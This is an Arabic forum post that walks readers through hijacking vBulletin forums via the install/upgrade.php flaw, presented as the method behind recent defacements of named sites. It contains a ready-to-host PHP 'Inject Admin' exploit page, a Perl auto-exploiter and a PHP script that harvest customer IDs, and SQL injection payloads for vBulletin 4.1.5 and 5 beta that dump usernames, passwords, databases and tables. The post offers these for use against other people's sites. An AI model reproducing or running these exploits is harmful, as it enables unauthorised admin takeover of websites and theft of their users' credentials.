حالة الموضوع:
مغلق
  1. كونكورد

    كونكورد Developer

    الأنتساب:
    ‏25 يناير 2013
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    السلام عليكم ورحمة الله وبركاته

    انتشرت اختراقات للمنتديات من قروب في الزون اتش

    بشكل ملفت خصوصا ان بعض المنتديات مهمة

    DirectAdmin Forums
    Hostmonster Forums
    https://forums.suse.com/

    وغيرها i:q4^:

    الثغرة كانت في مجلد الترقية :!:"
    كيف تخترق بالثغرة

    الخطوة الاولى :
    التاكد من وجود ملف /install/upgrade.php


    الخطوة الثانية :
    بعد الدخول الى /install/upgrade.php كلك يمين وعرض المصدر

    الخطوة الثالثة :

    البحث عن هذا القيمة CUSTNUMBER واذا وجدته انسخها


    الخطوة الرابع :
    رفع ملف الاستغلال على سيرفر واستعراضه
    كود PHP:
                     <html xmlns="http://www.w3.org/1999/xhtml"><head>      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">  <title>vBulletin 0day</title>  <style type="text/css">  <!-- body {     background-color: #000;     text-align: center;     color: #063;     font-size: large; } .a {    font-size: 24px; } .f {    color: #060; } .gbf {    color: #F00; } .dd {     color: #F00; } .w {     font-size: large; } a:link {     text-decoration: none; } a:visited {     text-decoration: none; } a:hover {     text-decoration: none; } a:active {     text-decoration: none; } --> </style></head><body>  <p class="a">  <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>  <br>Created by: 1337<br>Found on: 08/22/2013<br>Website: http://www.madleets.com</p>  <br><?php//extract data from the postif(isset($_POST['submit'])){extract($_POST);//set POST variables$url = $_POST['url'];$fields = array(                        'ajax' => urlencode('1'),                        'version' => urlencode('install'),                        'checktable' => urlencode('false'),                        'firstrun' => urlencode('false'),                        'step' => urlencode('7'),                        'startat' => urlencode('0'),                        'only' => urlencode('false'),                        'customerid' => urlencode($_POST['customerid']),                        'options[skiptemplatemerge]' => urlencode('0'),                        'response' => urlencode('yes'),                        'htmlsubmit' => urlencode('1'),                        'htmldata[username]' => urlencode($_POST['username']),                        'htmldata[password]' => urlencode($_POST['password']),                        'htmldata[confirmpassword]' => urlencode($_POST['password']),                        'htmldata[email]' => urlencode($_POST['email'])                );//url-ify the data for the POSTforeach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }rtrim($fields_string, '&');//open connection$ch = curl_init();//set the url, number of POST vars, POST datacurl_setopt($ch,CURLOPT_URL, $url);curl_setopt($ch,CURLOPT_POST, count($fields));curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );//execute post$result = curl_exec($ch);//close connectioncurl_close($ch);exit();}?><center><form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>"><span>Example:http://test.com/forum/install/upgrade.php</span><br>  <span>Website:</span>    <input name="url" type="text" tabindex="1" size="60" />    <br>    <span>Customer ID:</span>    <input name="customerid" type="text" tabindex="2" size="40" />    <br>    <span>Username:</span>    <input name="username" type="text" tabindex="3" size="40" />    <br>    <span>Password:</span>    <input name="password" type="text" tabindex="4" size="40" />    <br>    <span>Email:</span>    <input name="email" type="text" tabindex="5" maxlength="40" />    <input name="submit" type="submit" value="Inject Admin"></form></center> <p  class="a">------------------------------------------------------------------------------------------------------------------</p>   <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>  <p  class="a">------------------------------------------------------------------------------------------------------------------</p>    </div>         </pre>  <p class="a">&nbsp;</p> <p align="center">     </body></html>         


    وهذا رابط الاستغلال رفعته لكم
    vBulletin 0day


    يوجد ايضا استغلال بالبيرل واخر php

    وايضا
    vbulletin 4.1.5 attachment SQLI
    وايضا
    vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

    كود PHP:
                     vBulletin x.x.x Customer Area 0day-------------------------------------------------vBulletin x.x.x Customer Area 0dayPerl script got  leaked  so decided to post the perl script here Code:#!/usr/bin/perl use LWP::UserAgent;use HTTP::Request::Common;  system('cls');system('title vBulletin Install Auto Exploiter');print "\n ---------------------------------------";print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";print " ---------------------------------------\n";print " + d4tabase.com -+- d4tabase.com + ";print "\n ---------------------------------------\n";print " coded by n0tch shoutz d4tabase crew ";print "\n ---------------------------------------\n";  if($#ARGV == -1 or $#ARGV > 0){print "\n usage: ./vBulletin.pl domain (without http://) \n\n";exit;}  $domain = $ARGV[0];$install_dir = "install";$full_domain = "http://$domain/$install_dir/upgrade.php";chop($domain);  &search;    sub search{$url = $full_domain;$lwp = LWP::UserAgent->new();$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");$request = $lwp->post($url, ["searchHash" => "Search"]);  print " Searching $domain ----\n ";if ($request->content =~ /CUSTNUMBER = \"(.+)\";/){print "Result : $1\n";} else {print "Hash: Hash not found!\n";}}      php exploit ---------------------  <?phpset_time_limit(0);  if($argc 2) {    echo "Usage: {$argv[0]} http://site.ru/forum" PHP_EOL;    exit;}  $URL $argv[1];$arr parse_url($URL);  ### work with urlif(strpos($URL, '?')) die("Ohh, your URL is not valid");if(substr($URL, -1, 1) != '/') $URL = $URL . '/';if(!$arr['scheme']) $URL = 'http://' . $URL;  $headers = get_headers($URL . '/install/upgrade.php');if(substr($headers[0], 9, 3) == '200') {    $source = file_get_contents($URL . "/install/upgrade.php");}elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {    if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");}else die("something went wrong...");  preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);foreach ($res[1] as $hash) {    echo "Hash: " . $hash . PHP_EOL;    $fp = fopen("hash.txt", "a+");    fwrite($fp, $hash . PHP_EOL);}?>------------------------------------------------------------------------vbulletin 4.1.5 attachment SQLI  vbulletin 4.1.5 attachment SQLIexamine variables came across sq-injection, as later  found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in  vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions:  The account on the forum. Permission to attach files to messages /  themes (attachments) Register -> go to the forum -> click a topic  or if the board is, you can choose to create an article (the second  option more work) -> at the bottom looking Attachments 'Manage  Attachments' - > Open the window and setting "values ​​[f]" insert  our SQL query. Example: Code:http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1After that, we see the standard error of the database offline, thus opening the source code of the page and see:  Code:<! -  Database error in vBulletin 4.1.5 :   Invalid SQL :                SELECT                   permissionsfrom ,  Hidden ,  setpublish ,  publishdate ,  userid              FROM ds23fSDdfsdf_cms_node               WHERE                   nodeid  = - 1599  or ( 1 , 2 ) = (  Select * from ( Select name_const ( version () , 1 ), name_const (  version (), 1 )) a );   MySQL Error    :  Duplicate column Name  .1.49-3 '5 '  Error Number   :  1060  Request Date   :  Tuesday ,  February 12th  2013   @  01 : 12 : 33 PM  Error Date     :  Tuesday ,  February 12th  2013   @  01 : 12 : 33    Address     :  127.0.0.1  Username       :  Hacker  Classname      :  vB_Database  MySQL Version  :   -> ----------------------------------------------vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day_ _ _ _ _____ _____ ___ _____ _ ______ | | | | | | | | | _ | | _ |/ _ \ |_ _| (_) | ___| | |_| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_\ \ | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___ | _ |/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__/ _ \| |/ _` | '_ \| _/ _ \| '__/ _` |/ _ \| | | | (_| | (__| <| |_| | (_| | | | (_| | \ |_/ /> <\ |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/\_| |_/\__,_|\___|_|\_\\__, |\__,_|_| \__,_| \___//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|__/ | _/ | __/ | |___/ |__/ |___/ ____ ____ __ _ ______ ____ ____ _ __/ __ )__ __/ / /__ / /_(_)___ / ____/ / __ \/ __ \____ ___ __| | / / __ / / / / / / _ \/ __/ / __ \ /___ \ / / / / / / / __ `/ / / /| |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ / |___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, / /____/ ************************************************** ****************#Title: vBulletin 5 SQL Injection > Beta Whatever#Author: 0x0A#Date: Dec 11, 2012#Category: web application#Type: SQL Injection#Requirements: Firefox/Live HTTP Headers/#Software Link: http://www.vbulletin.com/purchases/http://www.vbulletin.com/features/#Homepage: hackyard.net***********.com#Version: 5 and above(not older versions)#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux#Demo sites to try: http://www.sultantheme.com/vb5connectforum/http://vb5connect.com/bb/************************************************** ****************   --------------------------------------------------------------------------------------------------------------------------------------How to--------------------------------------------------------------------------------------------------------------------------------------  -------------------------------------------------------------------================================================== =================-------------------------------------------------------------------[#1] First of all, make an account to the vBulletin 5 forum, http://img402.imageshack.us/img402/7784/69376730.png-------------------------------------------------------------------================================================== =================-------------------------------------------------------------------   -------------------------------------------------------------------================================================== =================-------------------------------------------------------------------[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/) http://imageshack.us/a/img12/305/89268702.png-------------------------------------------------------------------================================================== =================-------------------------------------------------------------------  -------------------------------------------------------------------================================================== =================-------------------------------------------------------------------[#3] After that click the Like button, you will receive  almost the same result as me. Go to the first POST record as the  picture below and click Replay button, http://imageshack.us/a/img707/9990/68621087.png-------------------------------------------------------------------================================================== =================-------------------------------------------------------------------  -------------------------------------------------------------------================================================== =================-------------------------------------------------------------------[#4] Then, on Send POST Content use this: -------------------------------------------------------------------------------------------------------------------------------------------------------------------nodeid=70) and(select 1 from(select  count(*),concat((select (select (SELECT  concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT  1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x  from information_schema.tables group by x)a) AND (1338=1338------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://imageshack.us/a/img42/1590/26447606.png //Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.The following SQLi command will fetch out the first record from user table(username/password).-------------------------------------------------------------------================================================== =================-------------------------------------------------------------------    -------------------------------------------------------------------================================================== =================-------------------------------------------------------------------[#Other SQLi Syntaxes] +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Version():+------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select concat(0x7e,0x27,cast(version() as  char),0x27,0x7e)) from information_schema.tables limit  0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND  (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+   +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|User():+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select concat(0x7e,0x27,cast(user() as  char),0x27,0x7e)) from information_schema.tables limit  0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND  (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+   +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Database():+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select concat(0x7e,0x27,cast(database() as  char),0x27,0x7e)) from information_schema.tables limit  0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND  (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Database Print:+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select (SELECT distinct  concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM  information_schema.schemata LIMIT 1,1)) from information_schema.tables  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by  x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+   +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Table Count:+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select (SELECT  concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM  `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE))  from information_schema.tables limit 0,1),floor(rand(0)*2))x from  information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+   +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Print Tables:+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select (SELECT distinct  concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM  information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT  N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from  information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+   +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Columns of selected table:+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select (SELECT  concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM  `information_schema`.columns WHERE  table_schema=0xhex_code_of_database_name AND  table_name=0xhex_code_of_table_name)) from information_schema.tables  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by  x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+   +------------------------------------------------------------------------------------------------------------------------------------------------------------------+|Fetch Out Data:+------------------------------------------------------------------------------------------------------------------------------------------------------------------++------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select  count(*),concat((select (select (SELECT  concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE  LIMIT N,1) ) from information_schema.tables limit  0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND  (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ -------------------------------------------------------------------================================================== =================------------------------------------------------------------------- |\ ' /-- (*) -->*<>0<@<>>>@<<*>@>*<0<<<>*>>@<<<@<<>@>>0<<<*<<@<>*>>0<<@<<<@<<<>@>>*<<@<>*<<0<*<\*/ >0>>*<<@<>0><<*<@<<___\\U//___ >*>>@><0<<*>>@><*<0<<|\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<< | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<|\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_ """"|'.'.'.|~~|.*.*.*| ____|_|'.'.'.|  |____|>>>>>>|~~~~~~~~ '""""`------'   ---------------------------------------------------- ==[ That`s it!==[ Thanks, 0x0A!==[ Romania ----------------------------------------------------         


    الخطوة الخامسة :

    وضع في خانة Customer ID قيمة CUSTNUMBER

    والخانة الاخرى اسم الادمن والباسورد والايميل وسيتم اضافة يوزر يحمل خصائص الادمن#:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة